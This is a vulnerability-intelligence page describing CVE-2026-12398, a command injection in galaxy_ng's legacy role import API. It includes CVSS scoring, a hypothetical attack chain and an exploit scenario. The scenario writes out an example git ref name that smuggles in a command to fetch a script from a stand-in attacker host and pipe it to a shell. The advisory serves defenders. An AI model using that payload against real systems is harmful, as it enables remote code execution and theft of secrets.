Skip to main content

galaxy_ng CVE-2026-12398

| EUVDEUVD-2026-37124 HIGH
OS Command Injection (CWE-78)
2026-06-16 redhat GHSA-6hw7-j4jw-wpff
7.5
CVSS 3.1 · Vendor: redhat
Share

Severity by source

Vendor (redhat) PRIMARY
7.5 HIGH
AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
vuln.today AI
7.5 HIGH

Network-reachable API (AV:N) but requires non-default GALAXY_ENABLE_LEGACY_ROLES and attacker-controlled git ref (AC:H); needs an authenticated account (PR:L); RCE on pulp worker yields full C/I/A impact.

3.1 AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
4.0 AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Red Hat
7.5 MEDIUM
qualitative

Primary rating from Vendor (redhat).

CVSS VectorVendor: redhat

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
High
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

1
Analysis Generated
Jun 16, 2026 - 15:23 vuln.today

DescriptionCVE.org

A command injection vulnerability was found in galaxy_ng. The do_git_checkout() function in the legacy role import API (v1) interpolates unsanitized git ref names (branch/tag names) into shell commands executed via subprocess.run() with shell=True. An authenticated user who controls a git repository can create a branch or tag with shell metacharacters in the name to achieve remote code execution on the pulp worker. The vulnerable endpoint is only reachable when GALAXY_ENABLE_LEGACY_ROLES is set to True, which is not the default configuration.

AnalysisAI

Remote code execution in galaxy_ng's legacy role import API (v1) allows an authenticated user controlling a git repository to execute arbitrary commands on the pulp worker by crafting a branch or tag name containing shell metacharacters. The flaw stems from unsanitized git ref interpolation into a subprocess.run() call with shell=True inside do_git_checkout(), and only affects deployments where GALAXY_ENABLE_LEGACY_ROLES is explicitly enabled (non-default). …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Authenticate to galaxy_ng API
Delivery
Host git repo with malicious ref name
Exploit
Submit legacy v1 role import
Install
Pulp worker runs do_git_checkout with shell=True
C2
Shell metacharacters in ref execute
Execute
Code runs as pulp worker
Impact
Pivot to AAP secrets

Vulnerability AssessmentAI

Exploitation Exploitation requires four concrete conditions, all derivable from the description and CVSS vector: (1) the target galaxy_ng deployment must have the setting GALAXY_ENABLE_LEGACY_ROLES=True, which is explicitly not the default; (2) the attacker must hold a low-privileged authenticated account on the Galaxy API (CVSS PR:L) able to call the legacy v1 role import endpoint; (3) the attacker must control a git repository reachable by the pulp worker so they can create a branch or tag whose name contains shell metacharacters; and (4) the malicious ref name must survive transport to do_git_checkout() and be passed into subprocess.run(..., shell=True). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The signals point to a real but conditional risk rather than a mass-exploitation issue. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker registers a low-privileged account on a galaxy_ng instance where GALAXY_ENABLE_LEGACY_ROLES is enabled, then publishes a git repository (e.g., on GitHub) containing a branch or tag named something like `v1.0;curl attacker.tld/s|sh;#`. They submit that repository through the legacy v1 role import API; the pulp worker invokes do_git_checkout(), which interpolates the ref into a shell command, and the injected payload executes on the worker as the pulp service user. …
Remediation Patch availability is not stated explicitly in the supplied data, so treat this as 'Patch available per vendor advisory' and consult https://access.redhat.com/security/cve/CVE-2026-12398 and https://bugzilla.redhat.com/show_bug.cgi?id=2489180 for the exact fixed galaxy_ng / Ansible Automation Platform 2 builds. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: identify all galaxy_ng deployments with GALAXY_ENABLE_LEGACY_ROLES enabled and assess operational criticality. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Vendor StatusVendor

Share

CVE-2026-12398 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy